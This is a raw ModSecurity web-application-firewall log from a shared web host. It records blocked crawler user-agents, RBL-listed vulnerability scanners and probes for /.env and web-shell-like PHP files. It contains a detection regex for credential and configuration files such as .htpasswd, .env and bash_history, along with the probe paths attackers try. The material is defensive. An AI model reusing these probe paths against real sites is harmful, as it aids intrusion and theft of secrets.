[Tue May 26 16:24:28.437977 2026] [security2:error] [pid 795941:tid 796198] [client 85.208.96.212:63186] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-18th/day/2024-12-15/"] [unique_id "ahV75O2GQ_TLE_VHIp2YHgAAAQQ"]
[Tue May 26 16:24:28.438110 2026] [security2:error] [pid 795941:tid 796198] [client 85.208.96.212:63186] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-18th/day/2024-12-15/"] [unique_id "ahV75O2GQ_TLE_VHIp2YHgAAAQQ"]
[Tue May 26 16:24:28.954836 2026] [security2:error] [pid 795941:tid 796160] [client 107.175.158.115:53388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stvica.com"] [uri "/.env"] [unique_id "ahV75O2GQ_TLE_VHIp2YKwAAAN4"]
[Tue May 26 16:24:29.002356 2026] [security2:error] [pid 795941:tid 796081] [client 20.48.248.215:65078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/zoo.php"] [unique_id "ahV75e2GQ_TLE_VHIp2YLgAAAI8"]
[Tue May 26 16:24:29.002488 2026] [security2:error] [pid 795941:tid 796081] [client 20.48.248.215:65078] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/zoo.php"] [unique_id "ahV75e2GQ_TLE_VHIp2YLgAAAI8"]
[Tue May 26 16:24:29.860106 2026] [security2:error] [pid 795941:tid 796124] [client 74.7.175.161:54776] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "koiralalogistics.com"] [uri "/cgi-sys/404.html"] [unique_id "ahV75e2GQ_TLE_VHIp2YPwAAulI"]
[Tue May 26 16:24:30.225128 2026] [security2:error] [pid 795941:tid 796092] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV74-2GQ_TLE_VHIp2YCwAAAJo"]
[Tue May 26 16:24:30.260568 2026] [security2:error] [pid 795941:tid 796115] [client 20.48.248.215:64367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/wp-link-spm.php"] [unique_id "ahV75u2GQ_TLE_VHIp2YTAAAALE"]
[Tue May 26 16:24:30.260691 2026] [security2:error] [pid 795941:tid 796115] [client 20.48.248.215:64367] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/wp-link-spm.php"] [unique_id "ahV75u2GQ_TLE_VHIp2YTAAAALE"]
[Tue May 26 16:24:30.489594 2026] [security2:error] [pid 795941:tid 796114] [client 107.175.158.115:41194] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stvica.com"] [uri "/api/.env"] [unique_id "ahV75u2GQ_TLE_VHIp2YUgAAALA"]
[Tue May 26 16:24:30.491528 2026] [security2:error] [pid 795941:tid 796120] [client 107.175.158.115:41182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stvica.com"] [uri "/backend/.env"] [unique_id "ahV75u2GQ_TLE_VHIp2YUwAAALY"]
[Tue May 26 16:24:31.094172 2026] [security2:error] [pid 795941:tid 796109] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV75e2GQ_TLE_VHIp2YNQAAAKs"]
[Tue May 26 16:24:32.003550 2026] [security2:error] [pid 795941:tid 796106] [client 184.154.139.45:51954] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV75-2GQ_TLE_VHIp2YagAAAKg"], referer: http://www.google.com/url?url=ivwellnessresources.org&yahoo.com
[Tue May 26 16:24:33.117532 2026] [security2:error] [pid 795941:tid 796177] [client 213.35.106.232:57974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahV76O2GQ_TLE_VHIp2YggAAAO8"]
[Tue May 26 16:24:33.131579 2026] [security2:error] [pid 795941:tid 796152] [client 20.48.248.215:63752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/wp-link-snpm.php"] [unique_id "ahV76e2GQ_TLE_VHIp2YgwAAANY"]
[Tue May 26 16:24:33.131730 2026] [security2:error] [pid 795941:tid 796152] [client 20.48.248.215:63752] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/wp-link-snpm.php"] [unique_id "ahV76e2GQ_TLE_VHIp2YgwAAANY"]
[Tue May 26 16:24:33.467146 2026] [security2:error] [pid 795941:tid 796129] [client 14.188.40.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV76O2GQ_TLE_VHIp2YbQAAAL8"]
[Tue May 26 16:24:33.914912 2026] [security2:error] [pid 795941:tid 796160] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV75-2GQ_TLE_VHIp2YZgAAAN4"]
[Tue May 26 16:24:34.699457 2026] [security2:error] [pid 795941:tid 796186] [client 20.48.248.215:63783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/xminie.php"] [unique_id "ahV76u2GQ_TLE_VHIp2YnAAAAPg"]
[Tue May 26 16:24:34.699650 2026] [security2:error] [pid 795941:tid 796186] [client 20.48.248.215:63783] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/xminie.php"] [unique_id "ahV76u2GQ_TLE_VHIp2YnAAAAPg"]
[Tue May 26 16:24:34.850548 2026] [security2:error] [pid 795941:tid 796194] [client 213.35.106.232:58157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahV76u2GQ_TLE_VHIp2YnQAAAQA"]
[Tue May 26 16:24:35.457095 2026] [security2:error] [pid 795941:tid 796115] [client 184.154.139.45:52790] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV76-2GQ_TLE_VHIp2YrwAAALE"], referer: http://www.google.com/url?url=ivwellnessresources.org&yahoo.com
[Tue May 26 16:24:35.704710 2026] [security2:error] [pid 795941:tid 796129] [client 20.48.248.215:64335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/bal.php"] [unique_id "ahV76-2GQ_TLE_VHIp2YtAAAAL8"]
[Tue May 26 16:24:35.704810 2026] [security2:error] [pid 795941:tid 796129] [client 20.48.248.215:64335] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/bal.php"] [unique_id "ahV76-2GQ_TLE_VHIp2YtAAAAL8"]
[Tue May 26 16:24:35.763565 2026] [security2:error] [pid 795941:tid 796198] [client 184.154.139.45:52906] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261085/et-divi-dynamic-261085.css"] [unique_id "ahV76-2GQ_TLE_VHIp2YuAAAAQQ"]
[Tue May 26 16:24:35.970407 2026] [security2:error] [pid 795941:tid 796118] [client 213.35.106.232:58477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-admin/load-scripts.php"] [unique_id "ahV76-2GQ_TLE_VHIp2YvAAAALQ"]
[Tue May 26 16:24:36.660396 2026] [security2:error] [pid 795941:tid 796073] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV76u2GQ_TLE_VHIp2YpAAAAIc"]
[Tue May 26 16:24:37.112292 2026] [security2:error] [pid 795941:tid 796090] [client 213.35.106.232:58685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-admin/load-styles.php"] [unique_id "ahV77e2GQ_TLE_VHIp2Y0AAAAJg"]
[Tue May 26 16:24:37.214188 2026] [security2:error] [pid 795941:tid 796072] [client 20.48.248.215:63705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/drykl.php"] [unique_id "ahV77e2GQ_TLE_VHIp2Y1AAAAIY"]
[Tue May 26 16:24:37.214340 2026] [security2:error] [pid 795941:tid 796072] [client 20.48.248.215:63705] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/drykl.php"] [unique_id "ahV77e2GQ_TLE_VHIp2Y1AAAAIY"]
[Tue May 26 16:24:37.465193 2026] [security2:error] [pid 795941:tid 796123] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV76-2GQ_TLE_VHIp2YtwAAALk"]
[Tue May 26 16:24:38.225506 2026] [security2:error] [pid 795941:tid 796166] [client 184.154.139.45:53692] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261085/et-core-unified-deferred-261085.min.css"] [unique_id "ahV77u2GQ_TLE_VHIp2Y4wAAAOQ"]
[Tue May 26 16:24:38.450110 2026] [security2:error] [pid 795941:tid 796127] [client 20.48.248.215:64363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/av.php"] [unique_id "ahV77u2GQ_TLE_VHIp2Y6wAAAL0"]
[Tue May 26 16:24:38.450240 2026] [security2:error] [pid 795941:tid 796127] [client 20.48.248.215:64363] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/av.php"] [unique_id "ahV77u2GQ_TLE_VHIp2Y6wAAAL0"]
[Tue May 26 16:24:39.006354 2026] [security2:error] [pid 795941:tid 796194] [client 213.35.106.232:58886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-includes/version.php"] [unique_id "ahV77-2GQ_TLE_VHIp2Y9wAAAQA"]
[Tue May 26 16:24:39.216912 2026] [security2:error] [pid 795941:tid 796108] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV77e2GQ_TLE_VHIp2Y3QAAAKo"]
[Tue May 26 16:24:39.818858 2026] [security2:error] [pid 795941:tid 796085] [client 213.35.106.232:59210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-includes/functions.php"] [unique_id "ahV77-2GQ_TLE_VHIp2ZDQAAAJM"]
[Tue May 26 16:24:40.030247 2026] [security2:error] [pid 795941:tid 796137] [client 20.48.248.215:63702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/11.php"] [unique_id "ahV78O2GQ_TLE_VHIp2ZDgAAAMc"]
[Tue May 26 16:24:40.030352 2026] [security2:error] [pid 795941:tid 796137] [client 20.48.248.215:63702] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/11.php"] [unique_id "ahV78O2GQ_TLE_VHIp2ZDgAAAMc"]
[Tue May 26 16:24:40.839013 2026] [security2:error] [pid 795941:tid 796078] [client 184.154.139.45:54434] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261075/et-divi-dynamic-261075-late.css"] [unique_id "ahV78O2GQ_TLE_VHIp2ZHgAAAIw"]
[Tue May 26 16:24:40.897888 2026] [security2:error] [pid 795941:tid 796077] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV77-2GQ_TLE_VHIp2ZAAAAAIs"]
[Tue May 26 16:24:41.061196 2026] [security2:error] [pid 795941:tid 796099] [client 20.48.248.215:65087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/77.php"] [unique_id "ahV78e2GQ_TLE_VHIp2ZIwAAAKE"]
[Tue May 26 16:24:41.061287 2026] [security2:error] [pid 795941:tid 796099] [client 20.48.248.215:65087] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/77.php"] [unique_id "ahV78e2GQ_TLE_VHIp2ZIwAAAKE"]
[Tue May 26 16:24:41.097735 2026] [security2:error] [pid 795941:tid 796158] [client 213.35.106.232:59371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-includes/class-wp.php"] [unique_id "ahV78e2GQ_TLE_VHIp2ZJAAAANw"]
[Tue May 26 16:24:41.564194 2026] [security2:error] [pid 795941:tid 796114] [client 114.119.131.163:30105] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "poonawallatennisacademy.com"] [uri "/plus-wallpaper"] [unique_id "ahV78e2GQ_TLE_VHIp2ZLwAAALA"], referer: https://poonawallatennisacademy.com/category/photography
[Tue May 26 16:24:41.712399 2026] [security2:error] [pid 795941:tid 796131] [client 20.48.248.215:64966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/x402.php"] [unique_id "ahV78e2GQ_TLE_VHIp2ZMQAAAME"]
[Tue May 26 16:24:41.712508 2026] [security2:error] [pid 795941:tid 796131] [client 20.48.248.215:64966] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/x402.php"] [unique_id "ahV78e2GQ_TLE_VHIp2ZMQAAAME"]
[Tue May 26 16:24:41.791780 2026] [security2:error] [pid 795941:tid 796164] [client 20.48.248.215:23515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV78e2GQ_TLE_VHIp2ZNAAAAOI"]
[Tue May 26 16:24:41.791887 2026] [security2:error] [pid 795941:tid 796164] [client 20.48.248.215:23515] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV78e2GQ_TLE_VHIp2ZNAAAAOI"]
[Tue May 26 16:24:41.883227 2026] [security2:error] [pid 795941:tid 796089] [client 213.35.106.232:59565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-includes/option.php"] [unique_id "ahV78e2GQ_TLE_VHIp2ZNQAAAJc"]
[Tue May 26 16:24:42.470083 2026] [security2:error] [pid 795941:tid 796090] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV78e2GQ_TLE_VHIp2ZMwAAAJg"]
[Tue May 26 16:24:43.353739 2026] [security2:error] [pid 795941:tid 796092] [client 213.35.106.232:59731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-includes/post.php"] [unique_id "ahV78-2GQ_TLE_VHIp2ZXAAAAJo"]
[Tue May 26 16:24:43.448390 2026] [security2:error] [pid 795941:tid 796105] [client 184.154.139.45:55026] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/260991/et-divi-dynamic-260991-late.css"] [unique_id "ahV78-2GQ_TLE_VHIp2ZYAAAAKc"]
[Tue May 26 16:24:43.590520 2026] [security2:error] [pid 795941:tid 796082] [client 20.48.248.215:63691] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/themes.php"] [unique_id "ahV78-2GQ_TLE_VHIp2ZYwAAAJA"]
[Tue May 26 16:24:43.590594 2026] [security2:error] [pid 795941:tid 796082] [client 20.48.248.215:63691] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/themes.php"] [unique_id "ahV78-2GQ_TLE_VHIp2ZYwAAAJA"]
[Tue May 26 16:24:44.210446 2026] [security2:error] [pid 795941:tid 796167] [client 213.35.106.232:59939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/wp-includes/user.php"] [unique_id "ahV79O2GQ_TLE_VHIp2ZcgAAAOU"]
[Tue May 26 16:24:44.312074 2026] [security2:error] [pid 795941:tid 796186] [client 195.178.110.48:55354] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "gnslocation.com.md-74.webhostbox.net"] [uri "/en"] [unique_id "ahV79O2GQ_TLE_VHIp2ZdgAAAPg"]
[Tue May 26 16:24:44.571102 2026] [security2:error] [pid 795941:tid 796180] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV78-2GQ_TLE_VHIp2ZawAAAPI"]
[Tue May 26 16:24:44.633949 2026] [security2:error] [pid 795941:tid 796126] [client 20.48.248.215:64430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/tiny.php"] [unique_id "ahV79O2GQ_TLE_VHIp2ZgAAAALw"]
